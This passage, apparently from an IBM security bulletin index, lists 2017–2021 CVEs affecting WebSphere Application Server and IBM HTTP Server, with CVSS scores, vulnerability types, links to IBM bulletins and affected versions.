Service](<https://www.ibm.com/support/pages/node/6524674>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-36090 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/6489683>) | Not affected | Liberty \n| CVE-2021-35603 | 3.7 | [IBM Java SDK for January 2022 CPU](<https://www.ibm.com/support/pages/node/6559306>) | Not affected | 9.0,8.5,Liberty \n| CVE-2021-35578 | 5.3 | [IBM Java SDK for October 2021 CPU](<https://www.ibm.com/support/pages/node/6520468>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2021-35564 | 5.3 | [IBM Java SDK for October 2021 CPU](<https://www.ibm.com/support/pages/node/6520468>) | Not affected | 9.0, 8.5, Liberty \n| 
CVE-2021-35550 | 5.9 | [IBM Java SDK for January 2022 CPU](<https://www.ibm.com/support/pages/node/6559306>) | Not affected | 9.0,8.5,Liberty \n| CVE-2021-35517 | 5.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/6489683>) | Not affected | Liberty \n| CVE-2021-34798 | 5.9 | Not affected | [Denial of service](<https://www.ibm.com/support/pages/node/6493841>) | 9.0 \n| CVE-2021-30641 | 5.3 | Not affected | [Weaker Security](<https://www.ibm.com/support/pages/node/6464029>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-29842 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6489485>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-29754 | 4.2 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6462627>) | Not affected | 9.0, 8.5, 8.0. 7.0 \n| CVE-2021-29736 | 5.0 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6476678>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-26691 | 5.9 | Not affected | [Heap Buffer Overflow](<https://www.ibm.com/support/pages/node/6467651>) | 9.0 \n| CVE-2021-26690 | 3.7 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6467651>) | 9.0 \n| CVE-2021-26296 | 8.8 | [Cross-site request forgery](<https://www.ibm.com/support/pages/node/6441433>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2021-23450 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6558594>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-20517 | 6.4 | [Directory Traversal](<https://www.ibm.com/support/pages/node/6456955>) | Not affected | 9.0, 8.5 \n| CVE-2021-20492 | 6.5 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6456017>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2021-20480 | 4.3 | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6441063>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2021-20454 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6445481>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| 
CVE-2021-20453 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6445171>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2021-20354 | 5.9 | [Directory traversal](<https://www.ibm.com/support/pages/node/6415959>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2021-20353 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6413709>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-4104 | 8.1 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6526750>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-2369 | 4.3 | [IBM Java SDK for July 2021 CPU](<https://www.ibm.com/support/pages/node/6481135>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2021-2161 | 5.9 | [IBM Java SDK for April 2021 CPU](<https://www.ibm.com/support/pages/node/6454853>) | Not affected | 9.0, 8.5, Liberty \n \n**2020 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2020-27221 | 9.8 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14797 | 3.7 | [IBM Java SDK for October 2020 CPU](<https://www.ibm.com/support/pages/node/6379260>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14782 | 3.7 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14781 | 3.7 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14621 | 5.3 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14581 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14579 | 3.7 | [IBM Java SDK for July 2020 
CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14578 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14577 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-13938 | 6.2 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6464029>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-11985 | 5.3 | Not affected | [Spoofing Vulnerability](<https://www.ibm.com/support/pages/node/6324789>) | 9.0 \n| CVE-2020-10693 | 5.3 | [Bypass security](<https://www.ibm.com/support/pages/node/6348216>) | Not affected | Liberty \n| CVE-2020-5258 | 7.5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6443101>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2020-5016 | 5.3 | [Directory traversal](<https://www.ibm.com/support/pages/node/6427873>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4949 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6408244>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4782 | 6.5 | [Directory Traversal](<https://www.ibm.com/support/pages/node/6356083>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4643 | 7.5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6334311>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4629 | 2.9 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6339255>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4590 | 5.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/6333623>) | Not affected | Liberty \n| CVE-2020-4589 | 8.1 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6258333>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4578 | 5.4 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6328895>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4576 | 5.3 | [Information 
Disclosure](<https://www.ibm.com/support/pages/node/6339807>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4575 | 4.7 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6323293>) | Not affected | 9.0, 8.5, 8.0VE, 7.0VE \n| CVE-2020-4534 | 7.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6255074>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4464 | 8.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6250059>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4450 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6220294>) | Not affected | 9.0,8.5 \n| CVE-2020-4449 | 7.5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6220296>) | Not affected | 9.0, 8.5, 8.0,7.0 \n| CVE-2020-4448 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6220336>) | Not affected | 9.0, 8.5, 8.0VE, 7.0VE \n| CVE-2020-4421 | 5.0 | [Identity spoofing](<https://www.ibm.com/support/pages/node/6205926>) | Not affected | Liberty \n| CVE-2020-4365 | 5.3 | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6209099>) | Not affected | 8.5 \n| CVE-2020-4362 | 7.5 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6174417>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4329 | 4.3 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6201862>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2020-4304 | 6.1 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6147195>) | Not affected | Liberty \n| CVE-2020-4303 | 6.1 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6147195>) | Not affected | Liberty \n| CVE-2020-4276 | 7.5 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6118222>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4163 | 6.6 | [Command Execution](<https://www.ibm.com/support/pages/node/1288786>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-2800 | 4.8 | [IBM Java SDK for April 2020 
CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2781 | 5.3 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2773 | 3.7 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2755 | 3.7 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2754 | 3.7 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2654 | 3.7 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2601 | 6.8 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2593 | 4.8 | [IBM Java SDK for January 2020 CPU](<https://www.ibm.com/support/pages/node/1289194>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2590 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-1934 | 8.1 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6191631>) | 9.0,8.5,8.0,7.0 \n| CVE-2020-1927 | 7.4 | Not affected | [Phishing attack](<https://www.ibm.com/support/pages/node/6191631>) | 9.0,8.5,8.0,7.0 \n \n**2019 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2019-17573 | 6.1 | [Cross-site Scripting](<https://www.ibm.com/support/pages/node/6100132>) | Not affected | Liberty \n| CVE-2019-17566 | 7.5 | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6322683>) | Not affected | 
9.0,8.5,8.0 \n| CVE-2019-17495 | 5.3 | [Information Disclosure](<https://www.ibm.com/support/pages/node/1274596>) | Not affected | Liberty \n| CVE-2019-12402 | 4.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/1074156>) | Not affected | Liberty \n| CVE-2019-12406 | 5.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/1288774>) | Not affected | 9.0,Liberty \n| CVE-2019-11777 | 7.5 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6602039>) | Not affected | Liberty \n| CVE-2019-10098 | 3.7 | Not affected | [Phishing attack](<https://www.ibm.com/support/pages/node/964768>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-10092 | 4.7 | Not affected | [Cross-site scripting](<https://www.ibm.com/support/pages/node/964768>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-10086 | 5.3 | [Unauthorized Access](<https://www.ibm.com/support/pages/node/1115085>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-9518 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9517 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9515 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9514 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9513 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9512 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-4732 | 7.2 | [IBM Java SDK for January 2020 CPU](<https://www.ibm.com/support/pages/node/1289194>) | Not affected | 9.0,8.5,Liberty \n| CVE-2019-4720 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1285372>) | Not affected | 9.0, 8.5, 8.0, 7.0 Liberty \n| CVE-2019-4670 | 6.5 | [Information 
Disclosure](<https://www.ibm.com/support/pages/node/1289152>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2019-4663 | 5.4 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/1127367>) | Not affected | Liberty \n| CVE-2019-4505 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/964766>) | Not affected | 9.0, 8.5, 7.0Virtual Enterprise \n| CVE-2019-4477 | 5.3 | [Information Disclosure](<https://www.ibm.com/support/pages/node/960290>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4442 | 4.3 | [Path Traversal](<https://www.ibm.com/support/pages/node/959021>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4441 | 5.3 | [Information disclosure](<https://www.ibm.com/support/pages/node/959023>) | Not affected | 9.0, 8.5, 8.0, 7.0 Liberty \n| CVE-2019-4305 | 5.3 | [Information disclosure](<https://www.ibm.com/support/pages/node/960171>) | Not affected | Liberty \n| CVE-2019-4304 | 6.3 | [Bypass security](<https://www.ibm.com/support/pages/node/960171>) | Not affected | Liberty \n| CVE-2019-4285 | 5.4 | [Clickjacking vulnerability](<https://www-01.ibm.com/support/docview.wss?uid=ibm10884064>) | Not affected | Liberty \n| CVE-2019-4279 | 9.0 | [Remote Code Execution](<https://www-01.ibm.com/support/docview.wss?uid=ibm10883628>) | Not affected | 9.0, 8.5, 7.0Virtual Enterprise \n| CVE-2019-4271 | 3.5 | [HTTP Parameter Pollution](<https://www.ibm.com/support/pages/node/884040>) | Not affected | 9.0, 8.5, 7.0Virtual Enterprise \n| CVE-2019-4270 | 5.4 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/884036>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4269 | 5.3 | [Information Disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10884032>) | Not affected | 9.0 \n| CVE-2019-4268 | 5.3 | [Path Traversal](<https://www.ibm.com/support/pages/node/884030>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4080 | 6.5 | [Denial of Service](<https://www-01.ibm.com/support/docview.wss?uid=ibm10875692>) | Not affected | 9.0, 
8.5, 8.0, 7.0 \n| CVE-2019-4046 | 5.9 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=ibm10869570>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2019-4030 | 5.4 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=ibm10869406>) | Not affected | 9.0, 8.5, 8.0VE, 7.0VE \n| CVE-2019-2989 | 6.8 | [IBM Java SDK for October 2019 CPU](<https://www.ibm.com/support/pages/node/1126887>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2019-2949 | 6.8 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2019-2426 | 3.7 | [IBM Java SDK for January 2019 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10873042>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2019-0220 | 5.3 | Not affected | [Weaker Security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10880413>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-0211 | 8.2 | Not affected | [Privilege Escalation](<https://www-01.ibm.com/support/docview.wss?uid=ibm10880413>) | 9.0 \n \n**2018 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| N/A | 8.1 | [Remote code execution in JSF](<http://www-01.ibm.com/support/docview.wss?uid=ibm10716525>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2018-25031 | 5.4 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6569505>) | Not affected | Liberty \n| CVE-2018-20843 | 3.3 | Not affected | [Denial of service](<https://www.ibm.com/support/pages/node/964768>) | 9.0, 8.5, 8.0, 9.0 \n| CVE-2018-17199 | 5.3 | Not affected | [Bypass security ](<http://www-01.ibm.com/support/docview.wss?uid=ibm10869064>) | 9.0 \n| CVE-2018-12547 | 9.8 | [IBM Java SDK for January 2019 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10873042>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2018-12539 | 8.4 
| [IBM Java SDK for July 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729349>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-10237 | 7.5 | \n\n[Denial of service](<https://www-01.ibm.com/support/docview.wss?uid=ibm10795696>)\n\n| Not affected | 9.0, 8.5, Liberty \n| CVE-2018-8039 | 7.5 | [Man-in-the-Middle](<https://www-01.ibm.com/support/docview.wss?uid=ibm10720065>) | Not affected | 9.0 Liberty \n| CVE-2018-3180 | 5.6 | [IBM Java SDK for October 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729607>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-3139 | 3.1 | [IBM Java SDK for October 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729607>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2800 | 4.2 | [IBM Java SDK for April 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22016282>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2783 | 7.4 | [IBM Java SDK for April 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22016282>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2637 | 7.4 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2634 | 6.8 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2633 | 8.3 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2603 | 5.3 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2602 | 4.5 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2579 | 3.7 | [IBM Java SDK for January 2018 
CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1996 | 5.3 | [Weaker Security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10793421>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1957 | 4.0 | [Information Disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10744247>) | Not affected | 9.0 \n| CVE-2018-1926 | 4.3 | [Cross-site Request Forgery](<http://www-01.ibm.com/support/docview.wss?uid=ibm10742301>) | Not affected | 9.0, 8.5 \n| CVE-2018-1905 | 7.1 | [XXE vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=ibm10738721>) | Not affected | 9.0 \n| CVE-2018-1904 | 8.1 | [Remote Code execution](<http://www-01.ibm.com/support/docview.wss?uid=ibm10738735>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1902 | 3.1 | [Spoofing Vulnerability](<https://www-01.ibm.com/support/docview.wss?uid=ibm10795115>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1901 | 5.0 | [Privilege Escalation](<http://www-01.ibm.com/support/docview.wss?uid=ibm10738727>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2018-1890 | 5.6 | [IBM Java SDK for January 2019 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10873042>) | Not affected | 9.0, 8.5, Library \n| CVE-2018-1851 | 7.3 | [Code execution](<https://www-01.ibm.com/support/docview.wss?uid=ibm10735105>) | Not affected | Liberty \n| CVE-2018-1840 | 6.0 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=ibm10735767>) | Not affected | \n\n9.0, 8.5 \n \n| CVE-2018-1798 | 6.1 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=ibm10730703>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1797 | 6.3 | [Directory traversal](<http://www-01.ibm.com/support/docview.wss?uid=ibm10730699>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1794 | 6.1 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729571>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1793 | 
6.1 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729563>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1777 | 5.4 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10730631>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1770 | 6.5 | [Directory traversal](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729521>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1767 | 6.1 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729547>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1755 | 5.9 | [Information Disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10728689>) | Not affected | Liberty \n| CVE-2018-1719 | 5.9 | [Weaker security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10718837>) | Not affected | 9.0, 8.5 \n| CVE-2018-1695 | 7.3 | [Spoofing vulnerability](<https://www-01.ibm.com/support/docview.wss?uid=ibm10716523>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2018-1683 | 5.9 | [Information disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10716533>) | Not affected | Liberty \n| CVE-2018-1656 | 7.4 | [IBM Java SDK for July 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729349>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1643 | 6.1 | [Cross-site Scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10716857>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2018-1626 | 4.3 | [Cross-site Request Forgery](<http://www-01.ibm.com/support/docview.wss?uid=ibm10742301>) | Not affected | 9.0, 8.5 \n| CVE-2018-1621 | 4.4 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22016821>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1614 | 5.8 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22016887>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1567 | 9.8 | [Code execution](<https://www-01.ibm.com/support/docview.wss?uid=swg22016254>) | Not affected | 
9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1553 | 5.3 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22016218>) | Not affected | Liberty \n| CVE-2018-1447 | 5.1 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1427 | 6.2 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1426 | 7.4 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \nROBOT | CVE-2018-1388 | 9.1 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22014196>) | 7.0 \n| CVE-2018-1301 | 5.3 | Not affected | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg22015344>) | 9.0, 8.5, 8.0, 7.0 \n \n**2017 CVEs**\n\n**Name** | **CVE** | **CVSS Score** | **WebSphere Application Server Bulletin or Assessment** | **IBM HTTP Server Bulletin or Assessment** | **Versions Affected** \n---|---|---|---|---|--- \n| CVE-2017-15715 | 3.7 | Not affected | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg22015344>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-15710 | 5.3 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22015344>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-12624 | 5.3 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22013597>) | Not affected | 9.0, Liberty \n| CVE-2017-12618 | 5.5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22009782>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-12613 | 9.1 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22013598>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-10388 | 7.5 | [IBM Java SDK for October 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22010560>) | 
Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10356 | 6.2 | [IBM Java SDK for October 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22010560>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10116 | 8.3 | [IBM Java SDK for July 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22007002>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10115 | 7.5 | [IBM Java SDK for July 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22007002>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10102 | 9.0 | [IBM Java SDK for July 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22007002>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-9798 | 7.5 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22009782>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-7679 | 5.3 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22005280>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-7668 | 5.3 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22005280>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-5638 | 7.3 | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg22000122>) | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg22000122>) | \n| CVE-2017-3736 | 5.9 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-3732 | 5.3 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-3511 | 7.7 | [IBM Java SDK for April 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22003016>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-3167 | 5.3 | Not affected | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg22005280>) | 9.0, 8.5, 8.0, 7.0 